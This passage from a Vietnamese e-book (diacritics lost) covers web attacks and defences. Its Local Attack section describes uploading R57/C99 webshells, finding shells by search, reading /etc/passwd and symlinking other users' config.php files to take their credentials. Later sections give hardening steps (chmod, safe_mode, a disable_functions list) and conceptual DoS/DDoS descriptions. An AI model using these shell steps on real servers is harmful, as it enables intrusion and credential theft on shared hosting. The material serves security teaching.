[E-book] Tan cong va phong thu ung dung WEB

LI M U
Cng vi s pht trin ca cng ngh thng tin, cng ngh mng my tnh v s
pht trin ca mng internet ngy cng pht trin a dng v phong ph. Cc dch v
trn mng thm nhp vo hu ht cc lnh vc trong i sng x hi. Cc thng tin
trn Internet cng a dng v ni dung v hnh thc, trong c rt nhiu thng tin
cn c bo mt cao hn bi tnh kinh t, tnh chnh xc v tnh tin cy ca n.
Bn cnh , cc hnh thc ph hoi mng cng tr nn tinh vi v phc tp hn. Do
i vi mi h thng, nhim v bo mt c t ra cho ngi qun tr mng l ht
sc quan trng v cn thit. Xut pht t nhng thc t , chng ta s tm hiu v cc
cch tn cng ph bin nht hin nay v cc phng chng cc loi tn cng ny.
Chnh v vy, thng qua vic nghin cu mt s phng php tn cng v cch bo
mt cc la tn cng ny, mnh mong mun gp mt phn nh vo vic nghin cu v
tm hiu v cc vn an ninh mng gip cho vic hc tp v nghin cu.
1. L do chn ti
Trong nhng nm gn y, Vit Nam ngy cng pht trin v nht l v mt cng
ngh thng tin. c bit l v ng dng web, hu nh mi ngi ai cng tng nghe v
lm vic trn ng dng web. Website tr nn ph bin v tr thnh mt phn quan
trng ca mi ngi v nht l cc doanh nghip, cng ty. Bn cnh l do an ton
bo mt cho ng dng web lun l vn nan gii ca mi ngi.V vy chng ta s
i tm hiu ng dng web v cch thc tn cng v bo mt web.
2. Mc tiu
Gip chng ta c th hiu hn v cc ng dng website, cc mi e da v vn
an ton thng tin khi chng ta lm vic trn ng dng web hng ngy, hiu r hn v
cc k thut tn cng v bo mt web.
3. Phm vi
Tm hiu cc k thut tn cng ph bin nht hin nay nh SQL Injection, Denial
Of Service, Local Attack,Cch bo mt, phng th cc loi tn cng ph bin trn
mt cch tng quan nht

MC LC

[E-book] Tan cong va phong thu ung dung WEB

CHNG 1.........................................................................................................4
TNG QUAN V WEBSITE, CC DCH V CA WEBSITE V LI BO MT
THNG DNG...................................................................................................4
1.1. M t Website v cch hot ng..................................................................4
1.2. Cc dch v v ng dng trn nn web..........................................................5
CHNG 2.........................................................................................................6
CC LOI TN CNG V BO MT NG DNG WEB PH BIN.................6
2.1. LOCAL ATTACK.......................................................................................6
2.1.1. Tm hiu v Local Attack.......................................................................6
2.1.2. Cch tn cng Local Attack....................................................................6
2.1.3. Cch bo mt cho Local Attack.............................................................10
2.1.4. Cc cng c h tr...............................................................................14
2.2. Tn cng t chi dch v - (Denial Of Service)............................................15
2.2.1. DOS(Denial Of Service).......................................................................15
2.2.2. Ddos(Distributed Denial of Service)......................................................18
2.2.3. Tn cng t chi dch v phn x nhiu vng DRDoS (Distributed
Reflection Denial of Service).........................................................................30
2.3. SQL Injection............................................................................................32
2.3.1. Tn cng SQL injection........................................................................32
2.3.2.Cch Phng Trnh SQL Injection...........................................................41
2.4. Cross Site Scripting (XSS).........................................................................46
2.4.1. Tn cng XSS.....................................................................................46
2.4.2. Phng chng.......................................................................................49
CHNG 3.......................................................................................................50
DEMO, NH GI V HNG PHT TRIN TI.....................................50
3.1. Demo.......................................................................................................50

Tav4 Bkav Forum

Trang 2

[E-book] Tan cong va phong thu ung dung WEB

3.2. Kt lun....................................................................................................51
3.2.1. Cc vn t c.............................................................................51
3.2.2. Hn ch..............................................................................................52
3.2.3. Hng pht trin ti.........................................................................52
NHN XT HNG DN................................................................................54
NHN XT PHN BIN...................................................................................55

Tav4 Bkav Forum

Trang 3

[E-book] Tan cong va phong thu ung dung WEB

CHNG 1
TNG QUAN V WEBSITE, CC DCH V CA WEBSITE V LI
BO MT THNG DNG
1.1. M t Website v cch hot ng
Website l mt trang web trn mng Internet, y l ni gii thiu nhng
thng tin, hnh nh v doanh nghip v sn phm, dch v ca doanh nghip (hay gii
thiu bt c thng tin g) khch hng c th truy cp bt k ni u, bt c lc
no.
Website l tp hp nhiu trang [web page]. Khi doanh nghip xy dng website
ngha l ang xy dng nhiu trang thng tin, catalog sn phm, dch v.... to nn
mt website cn phi c 3 yu t c bn:
Cn phi c tn min (domain).
Ni lu tr website (hosting).
Ni dung cc trang thng tin [web page].
Mt s thut ng c bn:
Website ng (Dynamic website) l website c c s d liu, c cung cp
cng c qun l website (Admin Tool). c im ca website ng l tnh linh hot v
c th cp nht thng tin thng xuyn, qun l cc thnh phn trn website d dng.
Loi website ny thng c vit bng cc ngn ng lp trnh nh PHP, Asp.net, JSP,
Perl,..., qun tr C s d liu bng SQL hoc MySQL...
Website tnh do lp trnh bng ngn ng HTML theo tng trang nh brochure,
khng c c s d liu v khng c cng c qun l thng tin trn website. Thng
thng website tnh c thit k bng cc phn mm nh FrontPage, Dreamwaver,...
c im ca website tnh l t thay i ni dung, s thay i ni dung ny thng
lin quan n s thay i cc vn bn i km th hin ni dung trn .
Hin nay, hu ht cc doanh nghip u s dng website ng, th h cng
ngh website c mi ngi bit n l web 2.0.
- Tn min (domain): Tn min chnh l a ch website, trn internet ch tn ti duy
nht mt a ch (tc l tn ti duy nht mt tn min). C 2 loi tn min:
- Tn min Quc t: l tn min c dng .com; .net; .org; .biz; .name ...
- Tn min Vit Nam: l tn min c dng .vn; .com.vn; .net.vn; org.vn; .gov.vn;...
- Lu tr website: D liu thng tin ca website phi c lu tr trn mt my tnh
(my ch - server) lun hot ng v kt ni vi mng Internet. Mt server c th lu
tr nhiu website, nu server ny b s c chng hn tt trong mt thi im no th

Tav4 Bkav Forum

Trang 4

[E-book] Tan cong va phong thu ung dung WEB

khng ai c th truy cp c nhng website lu tr trn server ti thi im b s c.
- Ty theo nhu cu lu tr thng tin m doanh nghip c th thu dung lng thch
hp cho website [thu dung lng host].
- Dung lng host: L ni lu c s tr d liu ca website (hnh nh, thng tin
), n v o dung lng thng l Mb hoc Gb.
- Bng thng hay dung lng ng truyn truyn: L tng s Mb d liu ti ln my
ch hoc ti v t my ch (download, upload) ni t website, n v o thng
thng l Mb/Thng.
1.2. Cc dch v v ng dng trn nn web
Vi cng ngh hin nay, website khng ch n gin l mt trang tin cung cp
cc tin bi n gin. Nhng ng dng vit trn nn web khng ch c gi l mt
phn ca website na, gi y chng c gi l phn mm vit trn nn web.
C rt nhiu phn mm chy trn nn web nh Google word (x l vn bn), Google
spreadsheets (x l bng tnh), Email ,
Mt s u im ca phn mm hay ng dng chy trn nn web:

Mi ngi u c trnh duyt v bn ch cn trnh duyt chy phn mm.

Phn mm lun lun c cp nht v chng chy trn server

Lun sn sng 24/7

D dng backup d liu thng xuyn

C th truy cp mi lc, mi ni, min l bn c mng

Chi ph trin khai cc r so vi phn mm chy trn desktop

Hy hnh dung bn c mt phn mm qun l bn hng hay qun l cng vic

cng ty. Khng phi lc no bn cng cng ty, vi phn mm vit trn nn web, bn
c th vo kim tra, iu hnh bt c u, thm ch bn ch cn mt chic in thoi
chy c trnh duyt nh IPhone m khng cn n mt chic my tnh.

Tav4 Bkav Forum

Trang 5

[E-book] Tan cong va phong thu ung dung WEB

CHNG 2
CC LOI TN CNG V BO MT NG DNG WEB PH BIN
2.1. LOCAL ATTACK
2.1.1. Tm hiu v Local Attack
- Local attack l mt trong nhng kiu hack rt ph bin v khng c khuyn
dng.i mt web server thng thng khi bn ng k mt ti khon trn server no
bn s c cp mt ti khon trn server v mt th mc qun l site ca
mnh. V d : tenserver/tentaikhoancuaban. V nh vy cng c mt ti khon ca
ngi dng khc tng t nh : tenserver/taikhoan1.Gi s taikhoan1 b hacker chim
c th hacker c th dng cc th thut,cc on scrip,cc on m lnh truy cp
sang th mc cha site ca bn l tenserver/taikhoancuaban. V cng theo cch ny
hacker c th tn cng sang cc site ca ngi dng khc v c th ly thng tin
admin,database,cc thng tin bo mt khc hoc chn cc on m c vo trang index
ca site bn. Dng tn cng trn gi l Local Attack
- Thng thng nht, Local Attack c s dng c ly thng tin config t
victim, sau da vo thng tin config v mc ch ca hacker ph hoi website
2.1.2. Cch tn cng Local Attack
- thc hin tn cng Local Attack, ty theo cch thc ca hacker m c nhng
cch Local khc nhau. Thng thng th cc hacker thng s dng cc on lnh
tn cng vo database.
2.1.2.1. Chun b
- Trc tin phi c mt con PHP/ASP/CGI backdoor trn server. Backdoor th c
rt nhiu loi khc nhau nhng ph bin nht l phpRemoteView (thng c gi l
remview) R57Shell, CGITelnet,C99,Tin hnh upload cc cng c trn ln,
thng l cc con shell nh R57,C99,
- Upload mt trong nhng cng c ln host (Thng th chng ta s dng cc con
shell R57,C99,.. v n mnh v d s dng)
- c host chng ta c nhiu cch:

Tav4 Bkav Forum

Trang 6

[E-book] Tan cong va phong thu ung dung WEB

+ Mua mt ci host(cch ny hacker t s dng v nhiu l do nhng l do c bn vn
l tn tin m khi up shell ln nu b admin ca server pht hin s b del host,..Vi
cch ny th sau khi Local xong th nn xa cc con shell ngay lp tc.
+ Hack mt trang b li v upload shell ln (thng th hacker s dng SQL Injection
hack mt trang web v chim ti khon admin ca trang web v upload cc con
shell ln)hoc khai thc li inclusion
+ Search backdoor (Vo google.com search keyword: <?phpRemoteView?> , r57Shell
...). Vi cch ny th hu ht cc con shell l ca cc hacker s dng v cha b xa,
nu c th chng ta nn upload cho chng ta mt con shell khc
2.1.2.2.Tin hnh Attack
- Sau khi chng ta chun b xong, tc l upload c con shell ln 1 server no
. Chng ta bt u tm cc website cng server m bn up shell ln, thng thng
cc hacker thng s dng Reverse Ip domain m hacker upload shell xem cc
website cng server
- Sau khi tm c danh sch website ,ln lt check xem site no b li v c th
local sang c
- Cc lnh thng dng trong shell Local Attack
Xem tn domain trn cng 1 host
ls -la /etc/valiases
cd /etc/vdomainaliases;ls lia
- Trng hp c bit khi khng th xem user nm cng host th ta thm && vo
cd /etc/vdomainaliases && ls lia
- Mun bit tn user th dng lnh :
cat /etc/passwd/
Hoc
less /etc/passwd
+ local sang victim, tc l local sang site khc
v d hin ti con shell chng ta ang :
/home/abcd/public_html/
th chng ta s local sang nh sau :
dir home/tn user cn local/public_html
- Mun bit tn user cn local sang th chng ta s dng Reverse Ip ly danh sch
user trn cng mt server.Mun bit user c tn ti hay khng chng ta m trnh
duyt web ln v nh on : Ip ca server/~ tn user (V d :
203.166.222.121/~doanchuyennganh). Nu trnh duyt hin ln trang index ca
website th tc l user tn ti

Tav4 Bkav Forum

Trang 7

[E-book] Tan cong va phong thu ung dung WEB

+Xem ni dung ca file
cat /home/tn user cn local/public_html/index.php
Hoc
Chng ta mun xem config ca 1 forum th dng
ln -s /home/tn user cn local/public_html/forum/includes/config.php
doanchuyennganh.txt
Vi doanchuyennganh.txt y l file chng ta to ra trn host ca chng ta xem
file ca ngi khc ! Nu khng s dng c cc lnh trn tc l server disable
chc nng .
Thm 1 s lnh shell trong linux :
- pwd: a ra ngoi mn hnh th mc ang hot ng (v d: /etc/ssh).
- cd: thay i th mc (v d: cd .. ra mt cp th mc hin ti; cd vidu vo th
mc /vidu).
- ls: a ra danh sch ni dung th mc.
- mkdir: to th mc mi (mkdir tn_thumuc).
- touch: to file mi (touch ten_file).
- rmdir: b mt th mc (rmdir ten_thumuc).
- cp: copy file hoc th mc (cp file_ngun file_ch).
- mv: di chuyn file hoc th mc; cng c dng t li tn file hoc th mc
(mv v_tr_c v_tr_mi hoc mv tn_c tn_mi).
- rm: loi b file (rm tn_file).
- tm kim file, bn c th dng: - find : dng cho cc tn file. - grep <>: tm ni
dung trong file.
xem mt file, bn c th dng:
- more : hin th file theo tng trang.
- cat <>: hin th tt c file.
- Nu mun kt ni ti mt host t xa, s dng lnh ssh. C php l ssh <tn_host>.
Qun l h thng:
- ps: hin th cc chng trnh hin thi ang chy (rt hu ch: ps l ci nhn ton b
v tt c cc chng trnh).
- Trong danh sch a ra khi thc hin lnh ps, bn s thy c s PID (Process
identification - nhn dng tin trnh).
Con s ny s c hi n khi mun ngng mt dch v hay ng dng, dng lnh kill
- top: hot ng kh ging nh Task Manager trong Windows. N a ra thng tin v
tt c ti nguyn h thng, cc tin trnh ang chy, tc load trung bnh Lnh top
-d <delay> thit lp khong thi gian lm ti li h thng. Bn c th t bt k gi
tr no, t .1 (tc 10 mili giy) ti 100 (tc 100 giy) hoc thm ch ln hn.
- uptime: th hin thi gian ca h thng v tc load trung bnh trong khong thi
gian , trc y l 5 pht v 15 pht.

Tav4 Bkav Forum

Trang 8

[E-book] Tan cong va phong thu ung dung WEB

Thng thng tc load trung bnh c tnh ton theo phn trm ti nguyn
h thng (vi x l, RAM, cng vo/ra, tc load mng) c dng ti mt thi
im. Nu tc c tnh ton l 0.37, tc c 37% ti nguyn c s dng. Gi tr
ln hn nh 2.35 ngha l h thng phi i mt s d liu, khi n s tnh ton
nhanh hn 235% m khng gp phi vn g. Nhng gia cc phn phi c th khc
nhau mt cht.
- free: hin th thng tin trn b nh h thng.
- ifconfig <tn_giao_din>: xem thng tin chi tit v cc giao din mng; thng
thng giao din mng ethernet c tn l eth(). Bn c th ci t cc thit lp mng
nh a ch IP hoc bng cch dng lnh ny (xem man ifconfig). Nu c iu g
cha chnh xc, bn c th stop hoc start (tc ngng hoc khi_ng) giao din bng
cch dng lnh ifconfig <tn_giao_din> up/down.
- passwd: cho php bn thay i mt khu (passwd ngi_dng_s_hu_mt_khu
hoc tn ngi dng khc nu bn ng nhp h thng vi vai tr root).
- useradd: cho php bn thm ngi dng mi (xem man useradd).
D phn phi no, bn cng c th dng phm TAB t ng hon chnh mt lnh
hoc tn file. iu ny rt hu ch khi bn quen vi cc lnh. Bn cng c th s dng
cc phm ln, xung cun xem cc lnh nhp. Bn c th dng lnh a dng trn
mt dng. V d nh, nu mun to ba th mc ch trn mt dng, c php c th l:
mkdir th_mc_1 ; mkdir th_mc_2 ; mkdir th_mc_3.
Mt iu th v khc na l cc lnh dng pipe. Bn c th xut mt lnh thng
qua lnh khc. V d: man mkdir | tail s a ra thng tin cc dng cui cng trong
trang xem "th cng" ca lnh mkdir.
Nu lc no c yu cu phi ng nhp vi ti khon gc (tc "siu"
admin ca h thng), bn c th ng nhp tm thi bng cch dng lnh su. Tham s
-1 (su-1) dng thay i th mc ch v cho cc lnh hoc ang dng. Ch l
bn cng s c nhc mt mt khu. thot hay ng : g exit hoc logout.
2.1.3. Cch bo mt cho Local Attack
hn ch Local Attack, chng ta nn Chmod filemanager ,di chuyn file
config.php v sa i file htaccess v nht l thng xuyn backup d liu.
-Chmod File Manager:
Tav4 Bkav Forum

Trang 9

[E-book] Tan cong va phong thu ung dung WEB

+ CHMOD th mc Public_html thnh 710 thay v 750 mc nh vic ny s gip bn
bo v c cu trc Website ca mnh.
+ CHMOD tip cc th mc con (diendan (http://diendan.doanchuyennganh.com),
CHMOD th mc diendan (http://diendan.doanchuyennganh.com) thnh 701, ri
CHMOD tip cc th mc con trong th mc diendan
(http://diendan.doanchuyennganh.com) thnh 701
+ CHMOD ton b file thnh 404
Vi CHMOD chc chn khi run shell s hin ra thng bo li:
Not Acceptable An appropriate representation of the requested resource
/test.php could not be found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an
ErrorDocument to handle the request.
Attacker s khng view c.
- Ngoi ra , mt s site th bn truy cp bng subdomain ca n m khng l dng
doanchuyenganh.com/diendan (http://diendan.doanchuyennganh.com), ci ny c
nhiu ngha, nhng trong bo mt th n s rt khc.
+ CHMOD th mc l 701 v c gng ng bao gi CHMOD 777, c mt s folder
ko quan trng, bn c th CHMOD 755 c th hin th ng v y mt s ni
dung trong Folder . Ch th ny, mt s Server h tr CHMOD th mc c
101, nu Server ca bn h tr ci ny th hy s dng n, v bin php CHMOD ny
rt an ton, n ngay c Owner cng ko th xem c cu trc Folder ngay c khi vo
FTP. Hin ch c Server ca Eshockhost.net l h tr ci ny.
+ CHMOD File l 604 v ng bao gi l 666 nu c vic cn 666 th chng ta
CHMOD tm s dng lc , sau hy CHMOD li ngay. i vi cc Server h
tr CHMOD file 404 chng ta hy CHMOD nh vy, v d Server Eshockhost.net
- Thay i cu trc, tn file mc nh c cha cc thng tin quan trng . Nu c th
hy thay i c cu trc CSDL nu bn lm c .
-Chng local bng cch bt safe-mode (dnh cho root):
Nh chng ta bit, i vi cc webshell - PHP, trong PHP Configuration c
nhng option hn ch tnh nng ca n (c bit l r57 - t ng by pass) nn cng
vic u tin ca cc root account l phi cp nht cc phin bn PHP mi nht v
config li php.ini : [i]PHP safe mode l phng php gii quyt vn bo mt cho
nhng ni server chia s hosting cho nhiu accounts (shared-server). N l do thit k
1 cch sai lc ca tng cp PHP. Hin nay, nhiu ngi chn phng php bt safemode bo mt, c bit l cc ISP
- Cc hng dn v cu hnh Security and Safe Mode :
Tav4 Bkav Forum

Trang 10

[E-book] Tan cong va phong thu ung dung WEB

Code:
safe_mode: mc nh : "0" sa di phn quyn : PHP_INI_SYSTEM
safe_mode_gid: mc nh :"0"sa di phn quyn : PHP_INI_SYSTEM
safe_mode_include_dir: mc nh :NULL sa di phn quyn : PHP_INI_SYSTEM
safe_mode_exec_dir: mc nh :""sa di PHP_INI_SYSTEM
safe_mode_allowed_env_vars: mc nh :"PHP_"sa di PHP_INI_SYSTEM
safe_mode_protected_env_vars: mc nh :"LD_LIBRARY_PATH"sa di
PHP_INI_SYSTEM
open_basedir: mc nh :NULL sa di PHP_INI_SYSTEM
disable_functions: mc nh :"" sa di php.ini
disable_classes : mc nh : ""sa di php.ini
- Sau y l cch c chnh cu hnh server bt ch safe mode :
Trong file php.ini :
safe_mode = Off chuyn thnh safe_mode = On
- disabled_functions nn cha nhng function sau :
PHP Code:
readfile,system, exec, shell_exec, passthru, pcntl_exec, putenv, proc_close,
proc_get_status, proc_nice, proc_open, proc_terminate, popen, pclose, set_time_limit,
escapeshellcmd, escapeshellarg, dl, curl_exec, parse_ini_file, show_source,ini_alter,
virtual, openlog
- Khi , ta v d :
PHP Code:
-rw-rw-r-- 1 doanchuyennganh doanchuyennganh 33 Jul 1 19:20 script.php
-rw-r--r-- 1 root root 1116 May 26 18:01 /etc/passwd
- Trong script.php l :
PHP Code:
<?php
readfile('/etc/passwd');
?>
- Kt qu :
PHP Code:
Warning: readfile() has been disabled for security reasons in /docroot/script.php on
line 2
- Vi li im ca vic bt safe mode:
- Thng khi upload file, file s vo /tmp/ vi nhng ngi c quyn khng phi l
owner.
- Bt safe-mode s c nhng bt li vi ngi lp trnh code PHP, do , h thng
c: PHP Code:

Tav4 Bkav Forum

Trang 11

[E-book] Tan cong va phong thu ung dung WEB

<?php
// Kim tra safe mode
if( ini_get('safe_mode') ){
// Code theo bt safe_mode
}else{
// Code theo tt safe_mode
}
?>
-Bo mt server apache :
By gi, xin gii thch tm quan trng ca apache :
Client (Hacker using local attack) ------> Shared server
Shared Server --------------------------> Apache
Apache ---------------------------------> PHP/Perl ... x l ...
PHP/Perl (gi kt qu) -----------------> Apache
Apache (gi kt qu) ------------------>Client
Do quyn chnh apache set .. ch 0 h ph thuc nhiu vo cc application nh
PHP/CGI ...
Ci t apache :
Code:
pw groupadd apache
pw useradd apache -c "Apache Server" -d /dev/null -g apache -s /sbin/nologin
Theo mc nh, cc process thuc Apache chy vi ch quyn ca ngi dng
nobody (ngoi tr process chnh phi chy vi ch quyn root) v GID thuc nhm
nogroup. iu ny c th dn n nhng e da bo mt nghim trng. Trong trng
hp t nhp thnh cng, tin tc c th ly c quyn truy dng n nhng process
khc chy cng UID/GID. Bi th, gii php ti u l cho Apache chy bng UID/GID
t nhm ring bit, chuyn ch n software y thi.
i vi nhng ai quen dng *nix hn khng l g vi khi nim UID/GID thuc
ch "file permission". Tuy nhin, chi tit ny nn m rng mt t cho nhng bn
c cha quen thuc vi UID/GID. Phn to nhm (group) v ngi dng (user) ring
cho Apache trn c hai chi tit cn ch l:
-d /dev/null: khng cho php user Apache c th mc $HOME nhng nhng user bnh
thng khc

Tav4 Bkav Forum

Trang 12

[E-book] Tan cong va phong thu ung dung WEB

-s /sbin/nologin: khng cho user Apache dng bt c mt shell no c. C mt s
trng hp dng -s /bin/true thay v nologin trn, true l mt lnh khng thc thi g
c v hon ton v hi.
L do khng cho php user Apache c th mc $HOME v khng c cp
mt "shell" no c v nu account Apache ny b c cho php, tin tc cng khng c
c hi tip cn vi system mc cn thit cho th thut "leo thang c quyn".
Trn mi trng *nix ni chung, "shell" l giao din gia ngi dng v h thng,
khng c shell th khng c c hi tip cn. Nu phn thit lp trn cung cp user
Apache mt $HOME v cho php dng mt shell no th khng mang gi tr g
trn quan im "bo mt".
Vo http://httpd.apache.org/ ci t phin bn mi nht (hin gi 2.2)
Khi ta nn set quyn ca php shell ring, n khng c quyn c nhy sang cc
user khc .
- Chmod trong /usr/bin nh sau :
-rwxr--r-x root nobody wget cho -rwxr-x--- root compiler gcc
- Chn bin dch gcc, trnh user dng nhng exploit sn bin dch get root.
Trong /bin/:
-rwxr-xr-x root root cp
- Tng t vi rm, mv, tar, chmod, chown, chgrp...
-rwsr-x--- root wheel su
-rwxr-x--- root root ln
2.1.4. Cc cng c h tr
-Cng c h tr Local Attack ph bin v hay dng nht l cc con shell.Cc loi shell
thng s dng l R57,C99,..

Tav4 Bkav Forum

Trang 13

[E-book] Tan cong va phong thu ung dung WEB

Hnh 1. Hnh nh ca 1 dng shell

Tav4 Bkav Forum

Trang 14

[E-book] Tan cong va phong thu ung dung WEB

2.2. Tn cng t chi dch v - (Denial Of Service)
2.2.1. DOS(Denial Of Service)
2.2.1.1. Gii thiu khi qut v DoS:
- DoS (Denial of Service) c th m t nh hnh ng ngn cn nhng ngi dng
hp php ca mt dch v no truy cp v s dng dch v . N bao gm
c vic lm trn ngp mng, lm mt kt ni vi dch v m mc ch cui
cng l lm cho server khng th p ng c cc yu cu s dng dch v
t cc client. DoS c th lm ngng hot ng ca mt my tnh, mt mng
ni b, thm ch c mt h thng mng rt ln. Thc cht ca DoS l k tn
cng s chim dng mt lng ln ti nguyn mng nh bng thng, b
nh v lm mt kh nng x l cc yu cu dch v n t cc client khc.
2.2.1.2. Cc cch thc tn cng:
+ Ph hoi da trn tnh gii hn hoc khng th phc hi ca ti nguyn mng.
- Thng qua kt ni:
Tn cng kiu SYN flood:
FPRIVATE "TYPE=PICT;ALT="
Li dng cc thc hot ng ca kt ni TCP/IP, hacker bt u qu trnh thit lp mt
kt ni TPC/IP vi mc tiu mun tn cng nhng s ph v kt ni ngay sau
khi qu trnh SYN v SYN ACK hon tt, khin cho mc tiu ri vo trng
thi ch (i gi tin ACK t pha yu cu thit lp kt ni) v lin tc gi gi
tin SYN ACK thit lp kt ni . Mt cch khc l gi mo a ch IP ngun
ca gi tin yu cu thit lp kt ni SYN v cng nh trng hp trn, my
tnh ch cng ri vo trng thi ch v cc gi tin SYN ACK khng th i n
ch do a ch IP ngun l khng c tht. Cch thc ny c th c cc
hacker p dng tn cng mt h thng mng c bng thng ln hn h
thng ca hacker.
- Li dng ngun ti nguyn ca chnh nn nhn tn cng:

Tav4 Bkav Forum

Trang 15

[E-book] Tan cong va phong thu ung dung WEB

Tn cng kiu Land Attack: cng tng t nh SYN flood nhng hacker s dng
chnh IP ca mc tiu cn tn cng dng lm a ch IP ngun trong gi tin,
y mc tiu vo mt vng lp v tn khi c gng thit lp kt ni vi chnh
n.
Tn cng kiu UDP flood: hacker gi gi tin UDP echo vi a ch IP ngun
l cng loopback ca chnh mc tiu cn tn cng hoc ca mt my tnh
trong cng mng vi mc tiu qua cng UDP echo (port 7) thit lp vic
gi v nhn cc gi tin echo trn 2 my tnh (hoc gia mc tiu vi chnh n
nu mc tiu c cu hnh cng loopback) khin cho 2 my tnh ny dn dn s
dng ht bng thng ca chng v cn tr hot ng chia s ti nguyn mng
ca

cc

my

tnh

khc

trong

mng.

-S dng bng thng:

Tn cng kiu DDoS (Distributed Denial of Service): y l cch thc tn cng rt
nguy him. Hacker xm nhp vo cc h thng my tnh, ci t cc chng
trnh iu kin t xa v s kch hot ng thi cc chng trnh ny vo cng
mt thi im ng lot tn cng vo mt mc tiu. Cch thc ny c th
huy ng ti hng trm thm ch hng ngn my tnh cng tham gia tn cng
mt lc (ty vo s chun b trc ca hacher) v c th ngn ht bng
thng

ca

mc

tiu

trong

nhy

mt.

-S dng cc ngun ti nguyn khc:

K tn cng li dng cc ngun ti nguyn m nn nhn cn n tn cng. Nhng
k tn cng c th thay i d liu v t sao chp d liu m nn nhn cn ln
nhiu ln lm CPU b qu ti v cc qu trnh x l d liu b nh tr.
- Tn cng kiu Smurf Attack: kiu tn cng ny cn mt h thng rt quan trng,
l mng khuych i. Hacker dng a ch ca my tnh cn tn cng gi
broadcast gi tin ICMP echo cho ton b mng. Cc my tnh trong mng s
ng lot gi gi tin ICMP reply cho my tnh m hacker mun tn cng. Kt
qu l my tnh ny s khng th x l kp thi mt lng ln thng tin nh
vy v rt d b treo.

Tav4 Bkav Forum

Trang 16

[E-book] Tan cong va phong thu ung dung WEB

- Tn cng kiu Tear Drop: trong mng chuyn mch gi, d liu c chia nh lm
nhiu gi tin, mi gi tin c mt gi tr offset ring v c th truyn i theo
nhiu ng ti ch. Ti ch, nh vo gi tr offset ca tng gi tin m d
liu li c kt hp li nh ban u. Li dng iu ny, hacker c th to ra
nhiu gi tin c gi tr offset trng lp nhau gi n mc tiu mun tn cng.
Kt qu l my tnh ch khng th sp xp c nhng gi tin ny v c th
b treo do dng ht nng lc x l ca h thng.
+.Ph hoi hoc chnh sa thng tin cu hnh.
Li dng vic cu hnh thiu an ton (v d nh vic khng xc thc thng tin trong
vic gi v nhn bn tin update ca cc router) m k tn cng s thay i t
xa hoc trc tip cc thng tin quan trng khin cho nhng ngi dng hp
php khng th s dng dch v. V d: hacker c th xm nhp vo DNS
thay i thng tin, dn n qu trnh bin dch domain name sang IP ca DNS
b sai lch. Kt qu l cc yu cu ca client n mt domain no s bin
thnh mt domain khc.
+.Ph hoi hoc chnh sa vt l phn cng.
Li dng quyn hn ca chnh bn thn k tn cng i vi cc thit b trong h thng
mng tip cn ph hoi (cc router, switch)
2.2.1.3 Cc cch phng chng
- DoS c th lm tiu tn rt nhiu thi gian cng nh tin bc, v vy, cn phi c
nhng bin php phng chng:
- M hnh h thng phi c xy dng hp l, trnh ph thuc ln nhau qu mc d
dn n mt b phn gp s c s lm c h thng b trc trc.
- Thit lp password bo v cc thit b hay cc ngun ti nguyn quan trng.
- Thit lp cc mc xc thc i vi ngi dng cng nh cc ngun tin trn
mng (cc thng tin cp nht nh tuyn gia cc router cng nn thit lp
ch

xc

thc)

- Xy dng h thng lc thng tin trn router, firewall v h thng bo v

chng li SYN flood.
- Ch chp nhn cc dch v cn thit, tm thi dng cc dch v cha c yu cu cung
cp hoc khng s dng.
- Xy dng h thng nh mc, gii hn cho ngi s dng ngn nga trng hp
ngi dng c c mun li dng cc ti nguyn trn server tn cng
chnh server hay mng, server khc.

Tav4 Bkav Forum

Trang 17

[E-book] Tan cong va phong thu ung dung WEB

- Lin tc cp nht, nghin cu, kim tra pht hin cc l hng bo mt v c bin
php khc phc kp thi.
- S dng cc bin php kim tra hot ng ca h thng mt cch lin tc pht
hin ngay nhng hnh ng bt bnh thng.
- Xy dng h thng d phng.
2.2.2. Ddos(Distributed Denial of Service)
- Distributed Denial Of Service (DDoS) l k thut tn cng lm cc ISP lo u, gii
hacker chnh thng th khng cng nhn DdoS l k thut tn cng chnh thng. Th
nhng Black hat ang c rt nhiu u th khi trin khai tn cng bng k thut DdoS.
Vic phng nga v ngn chn DdoS vn cn ang thc hin mc khc phc hu
qu v truy tm th phm
2.2.2.1. Cc giai on ca mt cuc tn cng kiu DdoS:
Bao gm 3 giai on:
i. Giai on chun b:
- Chun b cng c quan trng ca cuc tn cng, cng c ny thng thng hot
ng theo m hnh client-server. Hacker c th vit phn mm ny hay down load mt
cch d dng, theo thng k tm thi c khong hn 10 cng c DDoS c cung cp
min ph trn mng (cc cng c ny s phn tch chi tit vo phn sau)
- K tip, dng cc k thut hack khc nm trn quyn mt s host trn mng.
tin hnh ci t cc software cn thit trn cc host ny, vic cu hnh v th nghim
ton b attack-netword (bao gm mng li cc my b li dng cng vi cc
software c thit lp trn , my ca hacker hoc mt s my khc c
thit lp nh im pht ng tn cng) cng s c thc hin trong giai on ny.
ii. Giai on xc nh mc tiu v thi im:
- Sau khi xc nh mc tiu ln cui, hacker s c hot ng iu chnh attacknetword chuyn hng tn cng v pha mc tiu.
- Yu t thi im s quyt nh mc thit hi v tc p ng ca mc tiu i
vi cuc tn cng.
iii. Pht ng tn cng v xa du vt:
- ng thi im nh, hacker pht ng tn cng t my ca mnh, lnh tn cng
ny c th i qua nhiu cp mi n host thc s tn cng. Ton b attack-network (c
th ln n hng ngn my), s vt cn nng lc ca server mc tiu lin tc, ngn
chn khng cho n hot ng nh thit k.

Tav4 Bkav Forum

Trang 18

[E-book] Tan cong va phong thu ung dung WEB

- Sau mt khong thi gian tn cng thch hp, hacker tin hnh xa mi du vt c
th truy ngc n mnh, vic ny i hi trnh khc cao v khng tuyt i cn
thit.
2.2.2.2. Kin trc tng quan ca DDoS attack-network
Nhn chung DDoS attack-network c hai m hnh chnh:
M hnh Agent Handler
M hnh IRC Based
DDoS attack-network

Agent -Handler

IRC - Based

Client Handler

Client Handler

Communication

Communication

TCP

UDP

ICMP

TCP

UDP

Secret/private
channel

Public channel

ICMP

Hnh 2. S chnh phn loi cc kiu tn cng DDoS

i. M hnh Agent Handler:
Theo m hnh ny, attack-network gm 3 thnh phn: Agent, Client v Handler
Client : l software c s hacker iu khin mi hot ng ca attack-network
Handler : l mt thnh phn software trung gian gia Agent v Client
Agent : l thnh phn software thc hin s tn cng mc tiu, nhn iu khin t
Client thng qua cc Handler
Attacker

Handler

Agent

Attacker

Handler

Agent

Handler

Agent

Handler

Agent

Agent

Victim
Hnh 3. Kin trc attack-network kiu Agent Handler
Tav4 Bkav Forum

Trang 19

[E-book] Tan cong va phong thu ung dung WEB

